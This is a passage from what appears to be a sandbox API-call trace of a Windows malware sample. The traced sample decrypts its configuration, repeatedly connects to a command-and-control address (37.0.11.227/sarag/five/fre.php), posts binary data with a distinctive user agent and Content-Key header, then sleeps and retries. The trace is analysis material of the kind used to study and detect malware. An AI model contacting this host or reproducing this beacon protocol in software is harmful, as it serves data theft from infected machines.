Flags=0x0, Size=0xfd0) returned 0x6af418 [0180.185] recv (in: s=0x2d8, buf=0x6af418, len=4048, flags=0 | out: buf=0x6af418*) returned 204 [0180.260] GetProcessHeap () returned 0x690000 [0180.260] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0180.261] GetProcessHeap () returned 0x690000 [0180.261] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0180.261] GetProcessHeap () returned 0x690000 [0180.261] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a92a0 | out: hHeap=0x690000) returned 1 [0180.261] GetProcessHeap () returned 0x690000 [0180.262] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeff0 | out: hHeap=0x690000) returned 1 [0180.262] closesocket (s=0x2d8) returned 0 [0180.262] GetProcessHeap () returned 0x690000 [0180.262] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab370 | out: hHeap=0x690000) returned 1 [0180.262] GetProcessHeap () returned 0x690000 [0180.263] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0180.263] GetProcessHeap () returned 0x690000 [0180.264] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0180.264] GetProcessHeap () returned 0x690000 [0180.264] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0180.264] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6af418, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xaa4) returned 0x2d8 [0180.266] Sleep (dwMilliseconds=0xea60) [0180.267] GetProcessHeap () returned 0x690000 [0180.267] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0180.268] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.269] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0180.276] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.277] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0180.285] GetProcessHeap () returned 0x690000 [0180.285] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0180.285] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.286] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0180.287] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.287] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0180.288] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.288] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0180.288] GetProcessHeap () returned 0x690000 [0180.289] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0180.289] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.290] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0180.290] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.291] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0180.292] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.292] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0180.292] GetProcessHeap () returned 0x690000 [0180.292] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0180.293] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0180.293] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0180.294] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0180.296] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0180.297] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0180.297] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0180.298] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0180.298] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0180.298] GetProcessHeap () returned 0x690000 [0180.298] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0180.298] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0180.299] GetProcessHeap () returned 0x690000 [0180.299] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0180.299] GetProcessHeap () returned 0x690000 [0180.300] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0180.300] GetProcessHeap () returned 0x690000 [0180.300] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0180.300] GetProcessHeap () returned 0x690000 [0180.300] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0180.301] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.301] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0180.307] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.308] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0180.315] GetProcessHeap () returned 0x690000 [0180.315] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0180.315] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.316] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0180.317] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.317] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0180.318] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.318] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0180.318] GetProcessHeap () returned 0x690000 [0180.319] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0180.320] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.320] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0180.321] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.321] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0180.322] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.322] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0180.322] GetProcessHeap () returned 0x690000 [0180.322] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0180.322] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0180.323] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0180.323] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0180.324] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0180.324] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0180.324] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0180.325] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0180.325] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0180.325] GetProcessHeap () returned 0x690000 [0180.325] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0180.325] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a97a8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae988*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0180.326] GetProcessHeap () returned 0x690000 [0180.326] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab460 [0180.326] socket (af=2, type=1, protocol=6) returned 0x2dc [0180.326] connect (s=0x2dc, name=0x6ae988*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0180.353] FreeAddrInfoW (pAddrInfo=0x6a97a8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae988*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0180.353] GetProcessHeap () returned 0x690000 [0180.353] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0180.353] GetProcessHeap () returned 0x690000 [0180.353] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0180.353] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0180.354] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0180.354] GetProcessHeap () returned 0x690000 [0180.354] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6a92a0 [0180.354] GetProcessHeap () returned 0x690000 [0180.355] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0180.355] GetProcessHeap () returned 0x690000 [0180.355] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0180.355] GetProcessHeap () returned 0x690000 [0180.355] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0180.356] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0180.357] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0180.357] GetProcessHeap () returned 0x690000 [0180.357] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0180.357] GetProcessHeap () returned 0x690000 [0180.357] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0180.358] send (s=0x2dc, buf=0x6abd08*, len=242, flags=0) returned 242 [0180.358] send (s=0x2dc, buf=0x6aba40*, len=159, flags=0) returned 159 [0180.359] GetProcessHeap () returned 0x690000 [0180.359] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6af418 [0180.359] recv (in: s=0x2dc, buf=0x6af418, len=4048, flags=0 | out: buf=0x6af418*) returned 204 [0180.439] GetProcessHeap () returned 0x690000 [0180.440] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0180.440] GetProcessHeap () returned 0x690000 [0180.440] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0180.442] GetProcessHeap () returned 0x690000 [0180.442] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a92a0 | out: hHeap=0x690000) returned 1 [0180.443] GetProcessHeap () returned 0x690000 [0180.443] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0180.443] closesocket (s=0x2dc) returned 0 [0180.444] GetProcessHeap () returned 0x690000 [0180.444] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab460 | out: hHeap=0x690000) returned 1 [0180.444] GetProcessHeap () returned 0x690000 [0180.444] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0180.444] GetProcessHeap () returned 0x690000 [0180.445] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0180.445] GetProcessHeap () returned 0x690000 [0180.445] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0180.445] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6af418, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x60c) returned 0x2dc [0180.447] Sleep (dwMilliseconds=0xea60) [0180.449] GetProcessHeap () returned 0x690000 [0180.449] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0180.449] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.450] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0180.454] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.455] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0180.466] GetProcessHeap () returned 0x690000 [0180.466] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0180.467] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.468] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0180.468] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.469] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0180.469] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.472] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0180.472] GetProcessHeap () returned 0x690000 [0180.472] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0180.473] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.474] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0180.474] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.475] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0180.476] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.476] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0180.476] GetProcessHeap () returned 0x690000 [0180.476] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0180.477] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0180.477] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0180.478] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0180.478] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0180.479] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0180.479] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0180.480] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0180.485] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0180.485] GetProcessHeap () returned 0x690000 [0180.485] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0180.485] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0180.485] GetProcessHeap () returned 0x690000 [0180.485] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0180.486] GetProcessHeap () returned 0x690000 [0180.486] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0180.486] GetProcessHeap () returned 0x690000 [0180.486] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0180.486] GetProcessHeap () returned 0x690000 [0180.486] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0180.487] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.487] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0180.493] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.494] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0180.501] GetProcessHeap () returned 0x690000 [0180.501] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0180.501] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.502] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0180.503] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.505] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0180.506] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.506] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0180.506] GetProcessHeap () returned 0x690000 [0180.507] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0180.508] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.508] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0180.509] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.509] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0180.509] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.510] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0180.510] GetProcessHeap () returned 0x690000 [0180.510] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0180.510] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0180.511] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0180.511] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0180.512] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0180.512] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0180.512] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0180.513] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0180.514] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0180.514] GetProcessHeap () returned 0x690000 [0180.514] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0180.514] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b29c0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8e0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0180.514] GetProcessHeap () returned 0x690000 [0180.514] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3d0 [0180.514] socket (af=2, type=1, protocol=6) returned 0x2e0 [0180.516] connect (s=0x2e0, name=0x6ae8e0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0180.550] FreeAddrInfoW (pAddrInfo=0x6b29c0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8e0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0180.568] GetProcessHeap () returned 0x690000 [0180.568] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0180.568] GetProcessHeap () returned 0x690000 [0180.568] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0180.569] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0180.571] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0180.571] GetProcessHeap () returned 0x690000 [0180.571] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6a9a78 [0180.571] GetProcessHeap () returned 0x690000 [0180.571] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0180.572] GetProcessHeap () returned 0x690000 [0180.572] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0180.572] GetProcessHeap () returned 0x690000 [0180.572] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0180.573] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0180.574] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0180.574] GetProcessHeap () returned 0x690000 [0180.574] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0180.574] GetProcessHeap () returned 0x690000 [0180.575] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0180.575] send (s=0x2e0, buf=0x6abd08*, len=242, flags=0) returned 242 [0180.578] send (s=0x2e0, buf=0x6aba40*, len=159, flags=0) returned 159 [0180.579] GetProcessHeap () returned 0x690000 [0180.579] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6af418 [0180.579] recv (in: s=0x2e0, buf=0x6af418, len=4048, flags=0 | out: buf=0x6af418*) returned 204 [0180.723] GetProcessHeap () returned 0x690000 [0180.724] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0180.724] GetProcessHeap () returned 0x690000 [0180.724] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0180.725] GetProcessHeap () returned 0x690000 [0180.725] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9a78 | out: hHeap=0x690000) returned 1 [0180.725] GetProcessHeap () returned 0x690000 [0180.725] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0180.726] closesocket (s=0x2e0) returned 0 [0180.727] GetProcessHeap () returned 0x690000 [0180.727] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3d0 | out: hHeap=0x690000) returned 1 [0180.727] GetProcessHeap () returned 0x690000 [0180.727] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0180.727] GetProcessHeap () returned 0x690000 [0180.728] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 